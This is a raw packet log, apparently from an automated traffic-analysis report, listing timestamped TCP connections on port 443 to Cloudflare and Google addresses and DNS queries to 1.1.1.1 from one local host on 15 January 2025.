                                                                    Jan 15, 2025 22:50:17.162204981 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.638916969 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.639221907 CET49747443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:17.639230013 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.639698029 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.640028954 CET49747443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:17.640105009 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.640125036 CET49747443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:17.683439970 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.689012051 CET49747443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:17.775867939 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.776029110 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.776232958 CET49747443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:17.776998043 CET49747443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:17.777019024 CET44349747104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.780225992 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:17.780272007 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:17.780400991 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:17.782013893 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:17.782030106 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.073251009 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.073283911 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.073462963 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.074749947 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.074765921 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.238780975 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.239841938 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.239866972 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.240325928 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.242414951 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.242506981 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.242625952 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.286022902 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.286031008 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.379309893 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.379503965 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.381882906 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.383276939 CET49748443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.383302927 CET44349748104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.547955036 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.593291044 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.618676901 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.618683100 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.619242907 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.620780945 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.620851994 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.621073961 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.621265888 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.621298075 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.621354103 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.621360064 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.621541023 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.621575117 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880213022 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880249977 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880276918 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880295038 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.880295992 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880307913 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880345106 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880368948 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.880368948 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880383015 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880392075 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.880410910 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.880418062 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880448103 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.880486965 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.880495071 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.886697054 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.886745930 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.886754036 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.935081005 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.967176914 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967211962 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967241049 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967263937 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967281103 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.967293024 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967329979 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967330933 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.967365026 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967379093 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.967386961 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967438936 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.967442036 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.967484951 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.967885017 CET49749443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:18.967890024 CET44349749104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.987179995 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.987209082 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:18.987272024 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.987549067 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:18.987565041 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:19.446428061 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:19.446707964 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:19.446718931 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:19.447200060 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:19.447834969 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:19.447916985 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:19.448045969 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:19.487807989 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:19.487817049 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:19.570535898 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:19.570693016 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:19.570764065 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:19.571286917 CET49750443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:19.571300983 CET44349750104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:24.696372986 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:24.696394920 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:24.696485043 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:24.696768045 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:24.696784019 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.158005953 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.158437967 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.158463955 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.158925056 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.159450054 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.159537077 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.159914017 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.160047054 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.160072088 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.160187960 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.160224915 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.424103975 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.424442053 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.424500942 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.424524069 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.424671888 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.424720049 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.424729109 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.424808025 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.424912930 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.426459074 CET49751443192.168.2.8104.18.94.41
                                                                    Jan 15, 2025 22:50:25.426475048 CET44349751104.18.94.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.439954996 CET49752443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:25.439987898 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.440051079 CET49752443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:25.440249920 CET49752443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:25.440262079 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.452162027 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.452188015 CET44349753104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.452253103 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.452558994 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.452577114 CET44349753104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.904782057 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.905057907 CET49752443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:25.905069113 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.905519962 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.905848980 CET49752443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:25.905929089 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:25.905977964 CET49752443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:25.938101053 CET44349753104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.938409090 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.938420057 CET44349753104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.939810038 CET44349753104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.939877987 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.941145897 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.941174030 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.941246033 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.941260099 CET44349753104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.941310883 CET49753443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.941734076 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.941770077 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.941833973 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.942215919 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:25.942229033 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.951330900 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:26.051285028 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:26.051497936 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:26.051553965 CET49752443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:26.052354097 CET49752443192.168.2.8104.18.95.41
                                                                    Jan 15, 2025 22:50:26.052366018 CET44349752104.18.95.41192.168.2.8
                                                                    Jan 15, 2025 22:50:26.431227922 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:26.431538105 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:26.431550026 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:26.432537079 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:26.432594061 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:26.433759928 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:26.433825016 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:26.434036970 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:26.434046984 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:26.489011049 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.001281977 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.001380920 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.001497984 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.002943993 CET49754443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.002969980 CET44349754104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.220547915 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.220597029 CET44349757104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.220678091 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.220968008 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.220989943 CET44349757104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.703155041 CET44349757104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.703604937 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.703620911 CET44349757104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.704651117 CET44349757104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.704740047 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.705101013 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.705115080 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.705157042 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.705163956 CET44349757104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.705215931 CET49757443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.705683947 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.705703020 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.705766916 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.705971956 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:27.705997944 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.158879995 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.191338062 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:28.191361904 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.192440033 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.193536043 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:28.217780113 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:28.217864990 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.217931986 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:28.258030891 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:28.258055925 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.304198027 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:28.894470930 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.894560099 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.894624949 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:28.895859957 CET49758443192.168.2.8104.21.32.1
                                                                    Jan 15, 2025 22:50:28.895881891 CET44349758104.21.32.1192.168.2.8
                                                                    Jan 15, 2025 22:50:41.979851007 CET6130653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:41.984718084 CET53613061.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:41.984858036 CET6130653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:41.984985113 CET6130653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:41.989780903 CET53613061.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:42.439635992 CET53613061.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:42.440577984 CET6130653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:42.447288036 CET53613061.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:42.447396994 CET6130653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:51.659863949 CET49716443192.168.2.8142.250.185.195
                                                                    Jan 15, 2025 22:50:51.659895897 CET44349716142.250.185.195192.168.2.8
                                                                    Jan 15, 2025 22:51:04.865818024 CET61312443192.168.2.8142.250.185.196
                                                                    Jan 15, 2025 22:51:04.865931988 CET44361312142.250.185.196192.168.2.8
                                                                    Jan 15, 2025 22:51:04.866041899 CET61312443192.168.2.8142.250.185.196
                                                                    Jan 15, 2025 22:51:04.866286993 CET61312443192.168.2.8142.250.185.196
                                                                    Jan 15, 2025 22:51:04.866322994 CET44361312142.250.185.196192.168.2.8
                                                                    Jan 15, 2025 22:51:05.499476910 CET44361312142.250.185.196192.168.2.8
                                                                    Jan 15, 2025 22:51:05.499842882 CET61312443192.168.2.8142.250.185.196
                                                                    Jan 15, 2025 22:51:05.499880075 CET44361312142.250.185.196192.168.2.8
                                                                    Jan 15, 2025 22:51:05.500233889 CET44361312142.250.185.196192.168.2.8
                                                                    Jan 15, 2025 22:51:05.500566006 CET61312443192.168.2.8142.250.185.196
                                                                    Jan 15, 2025 22:51:05.500658989 CET44361312142.250.185.196192.168.2.8
                                                                    Jan 15, 2025 22:51:05.551239967 CET61312443192.168.2.8142.250.185.196
                                                                    Jan 15, 2025 22:51:07.318464041 CET49716443192.168.2.8142.250.185.195
                                                                    Jan 15, 2025 22:51:07.318605900 CET44349716142.250.185.195192.168.2.8
                                                                    Jan 15, 2025 22:51:07.318685055 CET49716443192.168.2.8142.250.185.195
                                                                    Jan 15, 2025 22:51:15.409193039 CET44361312142.250.185.196192.168.2.8
                                                                    Jan 15, 2025 22:51:15.409351110 CET44361312142.250.185.196192.168.2.8
                                                                    Jan 15, 2025 22:51:15.409456015 CET61312443192.168.2.8142.250.185.196
                                                                    Jan 15, 2025 22:51:17.318178892 CET61312443192.168.2.8142.250.185.196
                                                                    Jan 15, 2025 22:51:17.318259001 CET44361312142.250.185.196192.168.2.8
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 15, 2025 22:50:01.071538925 CET53549351.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:01.114082098 CET53523101.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:02.147677898 CET53544611.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:04.801645994 CET5472753192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:04.802057981 CET5166653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:04.808512926 CET53547271.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:04.809226990 CET53516661.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:05.930875063 CET5045253192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:05.933417082 CET6422353192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:05.939383030 CET53504521.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:05.950453043 CET53642231.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:06.864387989 CET6180753192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:06.864867926 CET5405953192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:06.871381044 CET53618071.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:06.881239891 CET53540591.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:08.791863918 CET5678653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:08.792005062 CET5558353192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:08.823741913 CET53555831.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:08.826075077 CET53567861.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:09.764815092 CET5777653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:09.765120029 CET6501753192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:09.773518085 CET53577761.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:09.860776901 CET53650171.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:11.272129059 CET5546753192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:11.272326946 CET6166453192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:11.272696018 CET5123953192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:11.272978067 CET5896353192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:11.273360968 CET6290653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:11.273507118 CET5724953192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:11.279088020 CET53616641.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:11.279431105 CET53589631.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:11.279442072 CET53512391.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:11.279567003 CET53554671.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:11.279963970 CET53572491.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:11.280350924 CET53629061.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:12.008012056 CET5326853192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:12.008169889 CET5035353192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:12.015053034 CET53532681.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:12.015691996 CET53503531.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:12.048093081 CET5106553192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:12.048264980 CET5604053192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:12.055560112 CET53560401.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:12.055775881 CET53510651.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:12.648525953 CET6423953192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:12.648704052 CET5747053192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:12.655364037 CET53642391.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:12.655714989 CET53574701.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:12.658690929 CET6104453192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:12.658839941 CET4916053192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:12.665497065 CET53610441.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:12.665605068 CET53491601.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:14.468406916 CET5541953192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:14.468406916 CET4930553192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:14.475235939 CET53493051.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:14.475248098 CET53554191.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:19.123927116 CET53621011.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.436950922 CET5344553192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:25.437087059 CET6269353192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:25.450193882 CET53626931.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:25.451634884 CET53534451.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.014081955 CET5594753192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:27.014261007 CET5888953192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:27.025734901 CET5553953192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:27.025881052 CET5770553192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:27.038466930 CET53577051.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:27.219800949 CET53555391.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:28.214243889 CET5465153192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:28.214446068 CET5190053192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:28.254652023 CET53519001.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:30.485727072 CET5385653192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:30.486113071 CET5888153192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:30.524693012 CET53588811.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:31.602735043 CET5392753192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:31.603131056 CET5867353192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:50:36.962260962 CET53651671.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:37.935563087 CET53561221.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:40.774629116 CET138138192.168.2.8192.168.2.255
                                                                    Jan 15, 2025 22:50:41.979266882 CET53526531.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:50:46.137494087 CET6053353192.168.2.81.1.1.1
